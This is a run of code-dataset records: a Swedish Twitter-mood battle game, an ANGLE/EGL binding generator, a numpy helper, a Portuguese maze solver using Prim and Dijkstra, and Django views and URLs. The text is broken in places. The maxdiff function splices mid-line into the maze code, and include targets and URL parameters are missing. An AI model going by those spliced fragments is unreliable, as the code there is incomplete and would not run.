slug=slug, lang__slug=lang, published=True)\n else:\n page = get_object_or_404(Pages, slug__isnull=True, lang__slug=lang, published=True)\n return render(request, page.template, {\"page\": page})\n","sub_path":"oms_cms/backend/pages/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"576092234","text":"\"\"\"Pokemon Battle GO!\"\"\"\nfrom twitter_search import geocodes\nfrom mood_score import calc_mood_score\nfrom mood_analysis import mood_analysis, text_emotions\nfrom sentiment_analysis import sentiment_analysis\nfrom random import randint\nimport random\nimport time\nfrom termcolor import colored, cprint\nimport colorama\n\ncolorama.init()\nfrom prints_module import delay_print, atk_txt, successful_block, unsuccessful_block\n\n\nclass Poketer:\n def __init__(self, name, mood, health, max_health, attack):\n self.name = name\n self.mood = mood\n self.health = health\n self.max_health = max_health\n self.attack = attack\n\n def attack_fnc(self, opponent_pokemon):\n opponent_pokemon.health -= self.attack\n atk_txt(self.name, opponent_pokemon.name, \"3 2 1...\")\n self.healtcheck_color(opponent_pokemon)\n\n def healtcheck_color(self, opponent_pokemon):\n\n if opponent_pokemon.health >= opponent_pokemon.max_health / 2:\n print(f\"{opponent_pokemon.name} hälsa: {colored(opponent_pokemon.health, 'green')}\\n\")\n elif opponent_pokemon.max_health / 4 <= opponent_pokemon.health <= opponent_pokemon.max_health / 2:\n print(f\"{opponent_pokemon.name} hälsa: {colored(opponent_pokemon.health, 'yellow')}\\n\")\n elif opponent_pokemon.health <= opponent_pokemon.max_health / 4:\n print(f\"{opponent_pokemon.name} hälsa: {colored(opponent_pokemon.health, 'red')}\\n\")\n\n def healthcheck(self,opponent_pokemon, opponent_name):\n if self.health <= 0 or opponent_pokemon.health <= 0:\n if opponent_pokemon.health <= 0:\n print(f'*** {opponent_name} Poketer {opponent_pokemon.name} svimmade. Du vann! ***')\n if self.health <= 0:\n print(f'*** Din poketer {self.name} svimmade. {opponent_name} vann! ***')\n alive = False\n return alive\n\n def block(self, opponent, opponent_pokemon):\n block_chance = randint(1, 11)\n if block_chance <= 7:\n time.sleep(1)\n self.health -= opponent_pokemon.attack // 2\n delay_print(f\"{opponent.name} attackerar {self.name}\", \"3 2 1...\", \"Boom!\") # Ändrade så att det stod \"attackerar\" som de andra printsatserna\n successful_block(self.name) # Flyttade ner denna så att den hamnar efter attacken, ser bättre ut\n print(f\"{self.name} tog {opponent_pokemon.attack // 2} i skada!\\n\")\n\n elif block_chance >= 8:\n time.sleep(1)\n self.health -= opponent_pokemon.attack\n delay_print(f\"{opponent.name} attackerar med {opponent_pokemon.name}\", \"3 2 1...\", \"Boom!\")\n unsuccessful_block(self.name)\n print(f\"{self.name} tog {opponent_pokemon.attack} i skada!\\n\")\n\n def update_max_health_by_city_mood(self, city, user_name):\n mood_score = calc_mood_score(self.mood, city, live=False)\n\n if mood_score == None:\n self.max_health += 20\n self.health += 20\n return None\n else:\n self.health += mood_score\n self.max_health += mood_score\n\n return mood_score\n\n def __repr__(self):\n return f'Poketer: {self.name} Mood: {self.mood}'\n\n\nclass User:\n def __init__(self, name):\n self.name = name\n self.team = []\n\n def add_team(self, poketer):\n self.team.append(poketer)\n\n def __repr__(self):\n return f'Namn: {self.name}, Team: {self.team}'\n\n\ndef main():\n user_pokemon = Poketer(colored(\"Happy Hasse\", 'blue'), \"happy\", 10, 10, 5)\n cpu_pokemon = Poketer(colored(\"Aggressive Ada\", 'red'), \"angry\", 10, 10, 5)\n\n cprint(f' Varmt välkomna till PokéMood!', 'cyan')\n\n cprint(colored(\"\"\"⢀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿\n ⣿⣿⣿⣿⣿⡏⠉⠛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⣿\n ⣿⣿⣿⣿⣿⣿⠀⠀⠀⠈⠛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⠉⠁⠀⣿\n ⣿⣿⣿⣿⣿⣿⣧⡀⠀⠀⠀⠀⠙⠿⠿⠿⠻⠿⠿⠟⠿⠛⠉⠀⠀⠀⠀⠀⣸⣿\n ⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣿⣿\n ⣿⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣴⣿⣿⣿⣿\n ⣿⣿⣿⣿⣿⣿⣿⣿⡟⠀⠀⢰⣹⡆⠀⠀⠀⠀⠀⠀⣭⣷⠀⠀⠀⠸⣿⣿⣿⣿\n ⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠈⠉⠀⠀⠤⠄⠀⠀⠀⠉⠁⠀⠀⠀⠀⢿⣿⣿⣿\n ⣿⣿⣿⣿⣿⣿⣿⣿⢾⣿⣷⠀⠀⠀⠀⡠⠤⢄⠀⠀⠀⠠⣿⣿⣷⠀⢸⣿⣿⣿\n ⣿⣿⣿⣿⣿⣿⣿⣿⡀⠉⠀⠀⠀⠀⠀⢄⠀⢀⠀⠀⠀⠀⠉⠉⠁⠀⠀⣿⣿⣿\n ⣿⣿⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠈⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣿\n ⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿\\n\"\"\", \"yellow\"))\n\n username = input(\"Vänligen ange ditt namn: \")\n user = User(colored(username, 'blue'))\n cpu = User(colored(\"Olof\", 'red'))\n cpu_extra_s = (colored(\"s\", 'red'))\n user.add_team(user_pokemon)\n cpu.add_team(cpu_pokemon)\n print(f\"Hej {user.name}. Din poketer är {user_pokemon.name}.\")\n print(f\"Din motståndare är {cpu.name} och har valt poketer {cpu_pokemon.name}.\\n\")\n print(f\"{user.name}, det är din tur! \")\n\n\n x = \"\"\"Din Poketer har ett visst humör. Du har nu möjligheten att öka din Poketers hälsa genom\n att söka efter en stad i Sverige där du tror att invånarna är på samma humör som din Poketer.\n Invånarnas humör baseras på vad de twittrar. Ju mer känslosamma de är desto mer ökar \n din Poketers hälsa. Lycka till!\"\"\"\n print(f\"\"\"\\n\n ----------------------------------------------------------------------------------------------------\n * *\n {x} \n * *\n ----------------------------------------------------------------------------------------------------\n \"\"\")\n\n\n for idx, city in enumerate(geocodes):\n if city:\n print(idx + 1, city.capitalize())\n city_choice = int(input(f\"Vilken stad väljer du? (1-{len(geocodes) - 1}): \"))\n city_list = list(geocodes)\n city = city_list[city_choice - 1]\n\n mood_score = user_pokemon.update_max_health_by_city_mood(city, user.name)\n\n x = f\" ... Beräknar humör för invånarna i {city.capitalize()} ...\"\n y = f\"{user_pokemon.name} fick {mood_score} i ökad hälsa! #YOLO\"\n if not mood_score:\n y = f\"Något gick fel men {user_pokemon.name} får 20 p i ökad hälsa! #YOLO\"\n\n print(f\"\"\"\n ----------------------------------------------------------------------------------------------------\n * *\n {x}\n {y}\n * *\n ----------------------------------------------------------------------------------------------------\n \"\"\")\n\n cpu_city_choice = random.choice(city_list)\n mood_score = cpu_pokemon.update_max_health_by_city_mood(cpu_city_choice, cpu.name)\n x = f\"{cpu.name} valde {cpu_city_choice.capitalize()}\"\n y = f\"{cpu_pokemon.name} fick {mood_score} p i ökad hälsa! #FTW\"\n\n print(f\"\"\"\\n\n ****************************************************************************************************\n ^ ^\n {x}\n {y}\n ^ ^\n ****************************************************************************************************\n \"\"\")\n\n input(\"Tryck enter för att fortsätta\")\n\n x = \"\"\" Attack-bonus! Du har nu chansen att öka din Poketers attack-styrka. \n Välj en stad och gissa vilket humör som är mest förekommande \n bland invånarna. Lycka till! \"\"\"\n print(f\"\"\"\\n\n ----------------------------------------------------------------------------------------------------\n * *\n {x} \n * *\n ----------------------------------------------------------------------------------------------------\n \"\"\")\n\n for idx, city in enumerate(geocodes):\n if city:\n print(idx + 1, city.capitalize())\n city_choice = int(input(f\"Vilken stad väljer du? (1-{len(geocodes) - 1}): \"))\n city_list = list(geocodes)\n city = city_list[city_choice - 1]\n\n for idx, emotion in enumerate(text_emotions):\n print(idx + 1, emotion.capitalize())\n emotion_choice = int(input(f\"Vilken känsla är mest förekommande i {city.capitalize()}? (1-{len(text_emotions)}): \"))\n emotion_list = list(text_emotions)\n emotion = emotion_list[emotion_choice - 1]\n\n most_frequent_emotions = mood_analysis(city=city, live=False)\n\n attack_bonus = 10\n if emotion in most_frequent_emotions:\n user_pokemon.attack += attack_bonus\n x = f\"\"\"Rätt! Vanligast är att man är {emotion} i {city.capitalize()}.\n Din poketer belönas med {attack_bonus} p i ökad attack-styrka!\"\"\"\n else:\n x = f\"\"\"Tyvärr! I {city.capitalize()} är man {most_frequent_emotions[0]}, inte {emotion}!\n Du får ingen attack-bonus.\"\"\"\n\n print(f\"\"\"\n ----------------------------------------------------------------------------------------------------\n * *\n {x}\n * *\n ----------------------------------------------------------------------------------------------------\n \"\"\")\n\n x = f\"{cpu.name} valde Kiruna och gissade arg, vilket var rätt!\"\n y = f\"{cpu_pokemon.name} belönas med {attack_bonus} p i ökad attack-styrka! #FTW\"\n\n print(f\"\"\"\\n\n ****************************************************************************************************\n ^ ^\n {x}\n {y}\n ^ ^\n ****************************************************************************************************\n \"\"\")\n\n input(\"Tryck enter för att fortsätta\")\n\n\n x = \"\"\" Twitter-vadslagning! Har du koll på vad som trendar på sociala medier? \n Skriv in ett ord och på vilket språk du vill använda i sökningen. Gissa om \n de senaste tweetsen som innehåller detta ord är mest positiva, mest negativa\n eller neutrala. Om du gissar rätt belönas du med 10 p i ökad hälsa.\n Om du gissar fel bestraffas du med 10 p minskad hälsa. Lycka till! \"\"\"\n\n print(f\"\"\"\\n\n ----------------------------------------------------------------------------------------------------\n * *\n {x} \n * *\n ----------------------------------------------------------------------------------------------------\n \"\"\")\n\n print(\"Skriv in ett nyckelord att söka efter på Twitter. Exempel: COVID, Donald Trump, Estonia.\")\n keyword_choice = input(\">> \")\n\n language_choice = input(\"Vilket språk vill du söka efter? [S]venska eller [E]ngelska? \")\n if language_choice.lower() == \"s\":\n language_choice = \"swedish\"\n elif language_choice.lower() == \"e\":\n language_choice = \"english\"\n\n print(f\"Tror du folket på Twitter är mest positivt, mest negativt eller neutralt inställda till {keyword_choice}? \")\n attitude_choice = input(\"[P]ostiva - [N]egativa - ne[U]trala? \")\n if attitude_choice.lower() == \"p\":\n attitude_choice = \"positivt\"\n elif attitude_choice.lower() == \"n\":\n attitude_choice = \"negativt\"\n elif attitude_choice.lower() == \"u\":\n attitude_choice = \"neutralt\"\n\n print(\"Det här kan ta en liten stund... Vänligen vänta. :)\")\n\n # Ni får testköra genom att söka efter covid på engelska\n result = sentiment_analysis(keyword=keyword_choice, language=language_choice,\n file_name='demo_tweets_english_covid.p', live=False)\n\n health_bonus = 10\n if attitude_choice == result:\n user_pokemon.health += health_bonus\n user_pokemon.max_health += health_bonus\n x = f\"\"\"Rätt! {keyword_choice} har mest {result} innehåll på Twitter.\n Din pokemon belönas med {health_bonus} poäng i ökad hälsa!\"\"\"\n else:\n user_pokemon.health -= health_bonus\n user_pokemon.max_health -= health_bonus\n x = f\"\"\"Tyvärr, {keyword_choice} har mest {result} innehåll på Twitter!\n Din pokemon bestraffas med {health_bonus} p i minskad hälsa.\"\"\"\n\n print(f\"\"\"\n ----------------------------------------------------------------------------------------------------\n * *\n {x}\n * *\n ----------------------------------------------------------------------------------------------------\n \"\"\")\n\n input(\"Tryck enter för att fortsätta\")\n\n x = \"Nu är det dags för battle!\"\n\n print(f\"\"\"\n ----------------------------------------------------------------------------------------------------\n * *\n {x}\n * *\n ----------------------------------------------------------------------------------------------------\n \"\"\")\n\n input(\"Tryck enter för att fortsätta\")\n\n while (user_pokemon.health >= 0) and (cpu_pokemon.health >= 0):\n if user_pokemon.health <= 0 or cpu_pokemon.health <= 0:\n if cpu_pokemon.health <= 0:\n break\n if user_pokemon.health <= 0:\n print(f'*** Din poketer {user_pokemon.name} svimmade. {cpu.name} vann! ***')\n break\n\n else:\n print(f\"*** Det är {colored('Din', 'blue')} tur ***\")\n user_choose = int(input(\"Vill du [1] attackera eller [2] blockera? \"))\n if user_choose == 1:\n user_pokemon.attack_fnc(cpu_pokemon)\n if user_pokemon.healthcheck(cpu_pokemon, cpu.name) is False:\n break\n\n elif user_choose == 2:\n user_pokemon.block(cpu, cpu_pokemon)\n if user_pokemon.healthcheck(cpu_pokemon, cpu.name) is False:\n break\n\n if cpu_pokemon.health > 0:\n print(f'*** Det är {cpu.name}{cpu_extra_s} tur ***')\n cpu_pokemon.attack_fnc(user_pokemon)\n if user_pokemon.healthcheck(cpu_pokemon, cpu.name) is False:\n break\n\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"sprint_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"294298810","text":"# Copyright (C) 2013 Bloomberg L.P. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport sys, os\n\nscriptDir = os.path.dirname(os.path.realpath(__file__))\nsys.path.insert(0, os.path.join(scriptDir, os.pardir, 'ui', 'gl'))\n\nimport generate_bindings # from src/ui/gl\n\ndef writeBindingCCFile(fCC, symbols):\n symbolMapping = {}\n for funcSet in generate_bindings.FUNCTION_SETS:\n funcSet = funcSet[0]\n for func in funcSet:\n for name in func.get('names', []):\n symbolMapping[name] = func\n for version in func.get('versions', []):\n symbolMapping[version['name']] = func\n if 'known_as' in func:\n symbolMapping[func['known_as']] = func\n\n # The following symbol mappings are for symbols that are present in the .def\n # files, but have no corresponding entry in src/ui/gl/generate_bindings.py,\n # so we provide them here.\n symbolMapping.update({\n 'glTexImage3DOES': {\n 'return_type': 'void',\n 'arguments': 'GLenum target, GLint level, GLenum internalformat, '\n 'GLsizei width, GLsizei height, GLsizei depth, '\n 'GLint border, GLenum format, GLenum type, '\n 'const GLvoid* pixels',\n },\n 'glReadnPixelsEXT': {\n 'return_type': 'void',\n 'arguments': 'GLint x, GLint y, GLsizei width, GLsizei height, '\n 'GLenum format, GLenum type, GLsizei bufSize, void *data',\n },\n 'glGetnUniformfvEXT': {\n 'return_type': 'void',\n 'arguments': 'GLuint program, GLint location, GLsizei bufSize, '\n 'GLfloat* params',\n },\n 'glGetnUniformivEXT': {\n 'return_type': 'void',\n 'arguments': 'GLuint program, GLint location, GLsizei bufSize, '\n 'GLint* params',\n },\n 'SetTraceFunctionPointers': {\n 'return_type': 'void',\n 'arguments': 'GetCategoryEnabledFlagFunc get_category_enabled_flag, '\n 'AddTraceEventFunc add_trace_event_func',\n },\n })\n\n fCC.write('// generated file -- DO NOT EDIT\\n')\n fCC.write('#include \\n')\n fCC.write('\\n')\n fCC.write('extern \"C\" {\\n')\n fCC.write('\\n')\n fCC.write('typedef void GLvoid;\\n')\n fCC.write('typedef char GLchar;\\n')\n fCC.write('typedef unsigned int GLenum;\\n')\n fCC.write('typedef unsigned char GLboolean;\\n')\n fCC.write('typedef unsigned int GLbitfield;\\n')\n fCC.write('typedef signed char GLbyte;\\n')\n fCC.write('typedef short GLshort;\\n')\n fCC.write('typedef int GLint;\\n')\n fCC.write('typedef int GLsizei;\\n')\n fCC.write('typedef unsigned char GLubyte;\\n')\n fCC.write('typedef unsigned short GLushort;\\n')\n fCC.write('typedef unsigned int GLuint;\\n')\n fCC.write('typedef float GLfloat;\\n')\n fCC.write('typedef float GLclampf;\\n')\n fCC.write('typedef __int32 GLfixed;\\n')\n fCC.write('typedef signed long int GLintptr;\\n')\n fCC.write('typedef signed long int GLsizeiptr;\\n')\n fCC.write('\\n')\n fCC.write('typedef HDC EGLNativeDisplayType;\\n')\n fCC.write('typedef HBITMAP EGLNativePixmapType;\\n')\n fCC.write('typedef HWND EGLNativeWindowType;\\n')\n fCC.write('typedef __int32 EGLint;\\n')\n fCC.write('typedef unsigned int EGLBoolean;\\n')\n fCC.write('typedef unsigned int EGLenum;\\n')\n fCC.write('typedef void *EGLConfig;\\n')\n fCC.write('typedef void *EGLContext;\\n')\n fCC.write('typedef void *EGLDisplay;\\n')\n fCC.write('typedef void *EGLSurface;\\n')\n fCC.write('typedef void *EGLClientBuffer;\\n')\n fCC.write('\\n')\n fCC.write('typedef const unsigned char* (*GetCategoryEnabledFlagFunc)(const char* name);\\n')\n fCC.write('typedef void (*AddTraceEventFunc)(char phase, const unsigned char* categoryGroupEnabled, const char* name,\\n')\n fCC.write(' unsigned long long id, int numArgs, const char** argNames,\\n')\n fCC.write(' const unsigned char* argTypes, const unsigned long long* argValues,\\n')\n fCC.write(' unsigned char flags);\\n')\n fCC.write('\\n')\n fCC.write('typedef void (__stdcall *angleFunctionPointer)(void);\\n')\n fCC.write('typedef angleFunctionPointer __eglMustCastToProperFunctionPointerType;\\n')\n fCC.write('\\n')\n for sym in symbols:\n func = symbolMapping[sym]\n fCC.write(func['return_type'] + ' __stdcall ' + sym + '(' + func['arguments'] + ');\\n')\n fCC.write('\\n')\n fCC.write('angleFunctionPointer __stdcall blpangle_getProcAddress(const char* name)\\n')\n fCC.write('{\\n')\n fCC.write(' struct Func {\\n')\n fCC.write(' const char* name;\\n')\n fCC.write(' angleFunctionPointer address;\\n')\n fCC.write(' };\\n')\n fCC.write('\\n')\n fCC.write(' static const Func funcs[] = {\\n')\n for symbol in symbols:\n fCC.write(' {\"' + symbol + '\", (angleFunctionPointer)' + symbol + '},\\n')\n fCC.write(' };\\n')\n fCC.write('\\n')\n fCC.write(' for (int i = 0; i < sizeof(funcs) / sizeof(Func); ++i) {\\n')\n fCC.write(' if (0 == strcmp(name, funcs[i].name)) {\\n')\n fCC.write(' return funcs[i].address;\\n')\n fCC.write(' }\\n')\n fCC.write(' }\\n')\n fCC.write('\\n')\n fCC.write(' return eglGetProcAddress(name);\\n')\n fCC.write('}\\n')\n fCC.write('\\n')\n fCC.write('} /* extern C */ \\n')\n\n\ndef doMain(args):\n inputDefs = []\n bindingsCCFile = None\n\n for i in range(len(args)):\n if args[i].endswith('.def'):\n inputDefs.append(args[i])\n elif args[i] == '--output-bindings-cc':\n bindingsCCFile = args[i+1]\n\n assert(inputDefs)\n assert(bindingsCCFile)\n\n symbols = []\n\n for inputDef in inputDefs:\n with open(inputDef, 'r') as f:\n for ln in f.readlines():\n ln = ln.strip()\n if -1 == ln.find('@'): continue\n if -1 != ln.find('NONAME'): continue\n symbol = ln.split('@')[0].strip()\n symbols.append(symbol)\n\n with open(bindingsCCFile, 'w') as fCC:\n writeBindingCCFile(fCC, symbols)\n\n\nif __name__ == '__main__':\n doMain(sys.argv[1:])\n","sub_path":"src/blpwtk2/gen_angle_bindings.py","file_name":"gen_angle_bindings.py","file_ext":"py","file_size_in_byte":7356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"145646605","text":"import numpy as np\n\n\ndef maxdiff(arr):\n \"\"\"Calculates the max arr[j]-arr[i] where i altura - 1:\n entradax = altura - 1\n if entraday > largura - 1:\n entraday = largura - 1\n if saidax > altura - 1:\n saidax = altura - 1\n if saiday > largura - 1:\n saiday = largura - 1\n\n\n\n vert = []\n num_vert = 0\n\n for i in range(altura):\n vert.append([])\n for j in range(largura):\n vert[i].append(num_vert)\n num_vert += 1\n\n adjacencia = []\n rand.seed()\n\n # Inicia adjacências\n for i in range(altura*largura):\n adjacencia.append([])\n for j in range(altura*largura):\n adjacencia[i].append(0)\n\n # Faz a matriz adjacência e cada posição será um nó, desse nó verifica-se as arestas direcionadas\n for i in range(altura):\n for j in range(largura):\n if j+1 < largura: # direita, se existir\n adjacencia[vert[i][j]][vert[i][j+1]] = int(rand.random() * 99)+1 \n if j-1 >= 0: # esquerda, se existir \n adjacencia[vert[i][j]][vert[i][j-1]] = int(rand.random() * 99)+1 \n if i+1 < altura: # de cima, se existir\n adjacencia[vert[i][j]][vert[i+1][j]] = int(rand.random() * 99)+1\n if i-1 >= 0: # de baixo, se existir\n adjacencia[vert[i][j]][vert[i-1][j]] = int(rand.random() * 99)+1\n\n\n cont = 0\n for i in range(altura*largura):\n for j in range(cont):\n adjacencia[i][j] = adjacencia[j][i]\n cont += 1\n\n #Prim\n\n\n def procurar_vertice(vertices, desejado):\n for altura_vert in range(len(vertices)):\n for largura_vert in range(len(vertices[0])):\n if vertices[altura_vert][largura_vert] == desejado:\n return altura_vert, largura_vert\n\n\n def procurar_menor_aresta(visitado, adjacencia):\n saida_aresta = 0\n entrada_aresta = 0\n for altura_aresta in range(len(visitado)): # visitar todos os vertices da lista visitado\n menor = 100\n for largura_aresta in range(altura*largura): # visitar todas as possibilidades daquela aresta\n if adjacencia[visitado[altura_aresta]][largura_aresta] > 0: # Apenas pegar aresta não 0\n if menor > adjacencia[visitado[altura_aresta]][largura_aresta]: # Pegar o menor das arestas\n if largura_aresta not in list(visitado): # So passa se o vertice que queremos ir nao estiver nos visitados\n menor = adjacencia[visitado[altura_aresta]][largura_aresta]\n saida_aresta = visitado[altura_aresta] # Saida sera o vertice em que se está analisando\n entrada_aresta = largura_aresta # Entrada eh a largura da adjacencia(entrada)\n\n return menor, saida_aresta, entrada_aresta\n\n # Matriz de vertices visitados para o algoritmo de PRIM, inicia-se ele com o vertice que se começa\n visitado = [0]\n\n # Adjancecia do labirinto de árvore mínima\n adjacencia_menor = []\n # Inicia adjacências\n for i in range(altura*largura):\n adjacencia_menor.append([])\n for j in range(altura*largura):\n adjacencia_menor[i].append(0)\n\n #somente se visitar tudo que para\n while len(visitado) != altura*largura:\n peso, saida_vertice, entrada_vertice = procurar_menor_aresta(visitado, adjacencia)\n visitado.append(entrada_vertice)\n adjacencia_menor[saida_vertice][entrada_vertice] = peso\n adjacencia_menor[entrada_vertice][saida_vertice] = peso\n\n\n #Djikstra\n\n vert_dji = []\n \n for i in range(altura):\n vert_dji.append([])\n for j in range(largura):\n vert_dji[i].append(9999)\n\n\n vert_dji[entradax][entraday] = 0\n\n nao_visitado_dji = []\n for i in range(altura*largura):\n nao_visitado_dji.append(i)\n\n visitado_dji = []\n proximo = [nao_visitado_dji.pop(vert[entradax][entraday])] \n proximo_bloco = []\n\n\n # ou para depois de tudo visitado ou quando chegar na posição final\n while len(visitado_dji) != altura*largura and len(proximo) != 0:\n if proximo[0] == vert[saidax][saiday]:\n visitado_dji.append(proximo.pop(0))\n break\n\n for i in range(altura*largura):\n if adjacencia_menor[proximo[0]][i] > 0: # Passa pela matriz de adjecencias e verifica qual caminho tomar\n x, y = procurar_vertice(vert, i) # Funcao que retorna o vertice da aresta\n if vert_dji[x][y] > adjacencia_menor[proximo[0]][i] and vert_dji[x][y] == 9999:\n x_atual, y_atual = procurar_vertice(vert, proximo[0]) # Se o caminho não foi tomado, será o proximo\n vert_dji[x][y] = vert_dji[x_atual][y_atual] + 1 # O proximo vertice será o anterior + 1\n proximo_bloco.append(i) # Adiciona-se à pilha de próximos\n nao_visitado_dji.remove(i) # Retira-se dos não visitados\n\n # Retira do proximo e coloca no visitado\n visitado_dji.append(proximo.pop(0))\n if len(proximo) == 0: # Se o bloco de proximos acabar, adiciona-se outro\n proximo = proximo_bloco\n proximo_bloco = []\n\n\n#Quando conseguir chegar até a saída, então ele faz o caminho de volta marcando até a entrada\n\n adjacencia_dji = [[saidax, saiday]]\n atual_x = saidax\n atual_y = saiday\n\n # Enquanto não chegar ao começo, não para\n while (atual_x != entradax) or (atual_y != entraday):\n for i in range(largura*altura): # Visitar todos os possíveis adjacentes\n if adjacencia_menor[vert[atual_x][atual_y]][i] > 0: # Ver quais disponiveis\n proximo_x, proximo_y = procurar_vertice(vert, i) # Guardar a disponivel\n if vert_dji[proximo_x][proximo_y] < vert_dji[atual_x][atual_y]:\n #Ver se a disponível é menor(é o caminho certo)\n adjacencia_dji.insert(0, [atual_x, atual_y]) # Se sim, adicionar às adjacencias\n atual_x, atual_y = proximo_x, proximo_y # Passar ao proximo\n\n adjacencia_dji.insert(0, [entradax, entraday])\n\n \n resposta = [] \n\n # montando os labirintos aqui\n for i in range((altura*2)+1):\n resposta.append([])\n for j in range((largura*2)+1):\n resposta[i].append(0)\n \n\n #alterar dimensão para melhor visualização\n\n for i in range(altura):\n for j in range(largura):\n resposta[(i * 2) + 1][(j * 2) + 1] = 1\n \n\n\n #paredes\n for i in range(altura*largura):\n for j in range(altura*largura):\n if adjacencia_menor[i][j] != 0:\n x_i, y_i = procurar_vertice(vert, i)\n x_i, y_i = (x_i * 2) + 1, (y_i * 2) + 1\n x_j, y_j = procurar_vertice(vert, j)\n x_j, y_j = (x_j * 2) + 1, (y_j * 2) + 1\n resposta[int((x_i + x_j) / 2)][int((y_i + y_j) / 2)] = 1\n \n\n for i in range(len(visitado_dji)):\n resp_x, resp_y = procurar_vertice(vert, visitado_dji[i])\n resp_x, resp_y = (resp_x * 2) + 1, (resp_y * 2) + 1\n \n \n\n vetor_resposta = []\n\n \n for i in range(len(adjacencia_dji) - 1):\n resp_x, resp_y = adjacencia_dji[i]\n resp_x, resp_y = (resp_x * 2) + 1, (resp_y * 2) + 1\n vetor_resposta.append([resp_x, resp_y])\n\n anterior_x, anterior_y = adjacencia_dji[i]\n posterior_x, posterior_y = adjacencia_dji[i + 1]\n anterior_x, anterior_y = (anterior_x * 2) + 1, (anterior_y * 2) + 1\n posterior_x, posterior_y = (posterior_x * 2) + 1, (posterior_y * 2) + 1\n if resposta[int((anterior_x + posterior_x) / 2)][int((anterior_y + posterior_y) / 2)] == 1:\n vetor_resposta.append([int((anterior_x + posterior_x) / 2), int((anterior_y + posterior_y) / 2)])\n\n for i in range(len(vetor_resposta)):\n resp_x, resp_y = vetor_resposta[i]\n resposta[resp_x][resp_y] = 2\n\n \n resposta[(entradax * 2) + 1][(entraday * 2) + 1] = 3\n resposta[(saidax * 2) + 1][(saiday * 2) + 1] = 4\n\n\n \n labirinto = []\n for i in range((altura*2)+1):\n labirinto.append([])\n for j in range((largura*2)+1):\n labirinto[i].append(0)\n\n\n for i in range(altura):\n for j in range(largura):\n labirinto[(i*2)+1][(j*2)+1] = 1\n\n \n for i in range(altura*largura):\n for j in range(altura*largura):\n if adjacencia_menor[i][j] != 0:\n x_i, y_i = procurar_vertice(vert, i)\n x_i, y_i = (x_i * 2) + 1, (y_i * 2) + 1\n x_j, y_j = procurar_vertice(vert, j)\n x_j, y_j = (x_j * 2) + 1, (y_j * 2) + 1\n labirinto[int((x_i+x_j)/2)][int((y_i+y_j)/2)] = 1\n\n labirinto[(entradax * 2) + 1][(entraday * 2) + 1] = 2\n labirinto[(saidax * 2) + 1][(saiday * 2) + 1] = 3\n\n\n\n \n cores = ([\"#551A8B\", \"#F0FFFF\", \"#7FFFD4\", \"#7FFF00\"])\n cmap = ListedColormap(cores)\n plt.figure('Labirinto original')\n plt.pcolormesh(labirinto, cmap=cmap)\n plt.axis(\"equal\")\n plt.xticks([])\n plt.yticks([])\n \n \n \n cores = ([\"#551A8B\", \"#F0FFFF\", \"#FFB90F\", \"#7FFFD4\", \"#7FFF00\"])\n cmap = ListedColormap(cores)\n plt.figure('Resposta de saída do Labirinto original')\n plt.pcolormesh(resposta, cmap=cmap)\n plt.axis(\"equal\")\n plt.xticks([])\n plt.yticks([])\n \n\n plt.show()\n\n\n#main\napp = QApplication([])\nex = Maze()\napp.exec_()\n","sub_path":"Labirinto - Boty, Dreka, Calebe/maze_BMR.py","file_name":"maze_BMR.py","file_ext":"py","file_size_in_byte":12824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"352470250","text":"from django.urls import path, include\nfrom rest_framework import routers\nfrom tasks.views import GoalManagerView, TaskManagerView, SubTaskManagerView\n\nurlpatterns = [\n path('project/', GoalManagerView.as_view(), name='task'),\n path('project/', GoalManagerView.as_view(), name='task-update'),\n path('task/', TaskManagerView.as_view(), name='task'),\n path('task//', TaskManagerView.as_view(), name='create-task'),\n path('subtask//', 